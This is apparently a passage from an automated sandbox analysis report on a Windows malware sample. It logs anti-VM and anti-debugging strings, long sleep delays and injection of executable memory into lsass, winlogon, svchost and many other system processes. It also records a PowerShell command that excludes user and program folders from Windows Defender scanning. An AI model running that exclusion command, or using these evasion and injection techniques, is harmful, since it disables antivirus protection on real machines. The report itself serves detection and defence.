                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeCode function: 4_2_000FC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,4_2_000FC220
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CB1DB0 FindFirstFileExA,5_2_00007FFDF7CB1DB0
                                  Source: C:\Windows\System32\winlogon.exeCode function: 22_2_00000225DC64DCE0 FindFirstFileExW,22_2_00000225DC64DCE0
                                  Source: C:\Windows\System32\winlogon.exeCode function: 22_2_00000225DC6ADCE0 FindFirstFileExW,22_2_00000225DC6ADCE0
                                  Source: C:\Windows\System32\lsass.exeCode function: 26_2_00000202C0AEDCE0 FindFirstFileExW,26_2_00000202C0AEDCE0
                                  Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002A66130DCE0 FindFirstFileExW,29_2_000002A66130DCE0
                                  Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAAF02DCE0 FindFirstFileExW,30_2_000002BAAF02DCE0
                                  Source: C:\Windows\System32\svchost.exeCode function: 51_2_0000026A879CDCE0 FindFirstFileExW,51_2_0000026A879CDCE0
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeCode function: 4_2_000FE6A3 VirtualQuery,GetSystemInfo,4_2_000FE6A3
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 600000Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 599890Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 599781Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 599665Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 599547Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 599433Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 599322Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 599187Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 599078Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 598969Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 598859Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 598750Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 598640Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 598531Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 598422Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 598312Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 598203Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 598093Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 597976Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 597828Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 597718Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 597609Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 597500Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 597389Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 597278Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 597172Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 597062Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 596953Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 596844Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 596703Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 596578Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 596469Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 596359Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 596250Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 596113Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 595984Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 595875Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 595763Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 595639Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 595531Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 595420Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 595312Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 595203Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 595089Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: main.exe, 00000005.00000002.1756028190.000002441A88E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                                  Source: main.exe, 00000005.00000002.1775219173.00000244324E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}i
                                  Source: s.exe, 00000004.00000002.1683325583.0000000006DF2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                  Source: main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: vmware
                                  Source: main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: PreventStartOnVirtualMachine
                                  Source: main.exe, 00000005.00000002.1775219173.00000244324E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                  Source: main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: VMwareVBox
                                  Source: main.exe, 00000005.00000002.1754567192.0000024417F1B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlltt
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeAPI call chain: ExitProcess graph end nodegraph_4-23942
                                  Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end node
                                  Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end node
                                  Source: C:\ProgramData\main.exeProcess information queried: ProcessInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeCode function: 0_2_00007FF61D32C67C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF61D32C67C
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CF1120 GetModuleHandleW,OutputDebugStringA,GetProcAddress,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,GetModuleHandleW,OutputDebugStringA,GetLastError,GetProcAddress,OutputDebugStringA,OutputDebugStringA,CorBindToRuntimeEx,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,5_2_00007FFDF7CF1120
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeCode function: 4_2_00107DEE mov eax, dword ptr fs:[00000030h]4_2_00107DEE
                                  Source: C:\Users\user\Desktop\hacn.exeCode function: 0_2_00007FF61D343BF0 GetProcessHeap,0_2_00007FF61D343BF0
                                  Source: C:\ProgramData\main.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\Windows\System32\dialer.exeProcess token adjusted: Debug
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                  Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                                  Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                                  Source: C:\Windows\System32\dialer.exeProcess token adjusted: Debug
                                  Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                                  Source: C:\Users\user\Desktop\hacn.exeCode function: 0_2_00007FF61D32C67C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF61D32C67C
                                  Source: C:\Users\user\Desktop\hacn.exeCode function: 0_2_00007FF61D32BDE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF61D32BDE0
                                  Source: C:\Users\user\Desktop\hacn.exeCode function: 0_2_00007FF61D32C860 SetUnhandledExceptionFilter,0_2_00007FF61D32C860
                                  Source: C:\Users\user\Desktop\hacn.exeCode function: 0_2_00007FF61D33ACD8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF61D33ACD8
                                  Source: C:\Users\user\Desktop\hacn.exeCode function: 1_2_00007FFE1A46004C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FFE1A46004C
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeCode function: 4_2_000FF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_000FF838
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeCode function: 4_2_000FF9D5 SetUnhandledExceptionFilter,4_2_000FF9D5
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeCode function: 4_2_000FFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_000FFBCA
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeCode function: 4_2_00108EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00108EBD
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CAD4C8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFDF7CAD4C8
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CA1214 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FFDF7CA1214
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CA1D14 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFDF7CA1D14
                                  Source: C:\Windows\System32\winlogon.exeCode function: 22_2_00000225DC647D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_00000225DC647D90
                                  Source: C:\Windows\System32\winlogon.exeCode function: 22_2_00000225DC64D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_00000225DC64D2A4
                                  Source: C:\Windows\System32\winlogon.exeCode function: 22_2_00000225DC6A7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_00000225DC6A7D90
                                  Source: C:\Windows\System32\winlogon.exeCode function: 22_2_00000225DC6AD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_00000225DC6AD2A4
                                  Source: C:\Windows\System32\lsass.exeCode function: 26_2_00000202C0AED2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_00000202C0AED2A4
                                  Source: C:\Windows\System32\lsass.exeCode function: 26_2_00000202C0AE7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_00000202C0AE7D90
                                  Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002A66130D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_000002A66130D2A4
                                  Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002A661307D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_000002A661307D90
                                  Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAAF02D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_000002BAAF02D2A4
                                  Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAAF027D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_000002BAAF027D90
                                  Source: C:\Windows\System32\dialer.exeCode function: 49_2_00007FF713F11131 Sleep,Sleep,_amsg_exit,_initterm,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,_cexit,49_2_00007FF713F11131
                                  Source: C:\Windows\System32\dialer.exeCode function: 49_2_00007FF713F1F1C0 SetUnhandledExceptionFilter,49_2_00007FF713F1F1C0
                                  Source: C:\Windows\System32\dialer.exeCode function: 49_2_00007FF713F14FC9 SetUnhandledExceptionFilter,49_2_00007FF713F14FC9
                                  Source: C:\Windows\System32\svchost.exeCode function: 51_2_0000026A879CD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,51_2_0000026A879CD2A4
                                  Source: C:\Windows\System32\svchost.exeCode function: 51_2_0000026A879C7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,51_2_0000026A879C7D90
                                  Source: C:\ProgramData\main.exeMemory allocated: page read and write | page guardJump to behavior

                                  HIPS / PFW / Operating System Protection Evasion

                                  barindex
                                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                  Source: C:\ProgramData\setup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -ForceJump to behavior
                                  Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 225DC610000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\lsass.exe base: 202C0AB0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2A6612D0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dwm.exe base: 2BAAEDC0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 225DC670000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\lsass.exe base: 202C0B10000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2A661330000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dwm.exe base: 2BAAEFF0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 26A87990000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 17953770000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2295D530000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 253067D0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1845B380000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D559040000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 241A9E70000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1CD73160000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2824E860000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 21B473C0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2086F9D0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 17183BC0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23FD3F70000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D2A4150000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 275BDF30000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1AAC0260000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 203C9F30000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B5644B0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1C004F60000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 24E2AB40000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2644ADB0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\spoolsv.exe base: 1990000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20D25DA0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 26EF5350000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2A7F0D60000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23D0FFB0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B1C2570000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2108BCE0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 29166940000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1988D570000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 13869B40000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1E1CC740000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2855DA70000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2BF199D0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 15AF3890000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 21A03B80000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\sihost.exe base: 1CD40E40000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 151A6530000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 19E27BC0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 17D7B150000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1BE621A0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2252F480000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 184683D0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\explorer.exe base: 8810000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1972E260000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dasHost.exe base: 2246C5E0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 221D5930000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A633B40000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2928D0A0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 1A22A640000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 21C6CF30000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF644F0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\audiodg.exe base: 1D349350000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 23B60D90000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F22F7C0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 28855150000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 25EF7B10000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 209A6850000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 238E5420000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 283B9F80000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 1FC2C760000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1F095230000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1AFBEF40000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 222412F0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 29CA4D30000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 2786ADF0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 15AAF380000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\cmd.exe base: 1F086AE0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\cmd.exe base: 1F086D10000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\reg.exe base: 1E5DD230000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files\Windows Defender\MpCmdRun.exe base: 20D20C40000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 20893350000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 2616B760000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 2616BA10000 protect: page execute and read and write
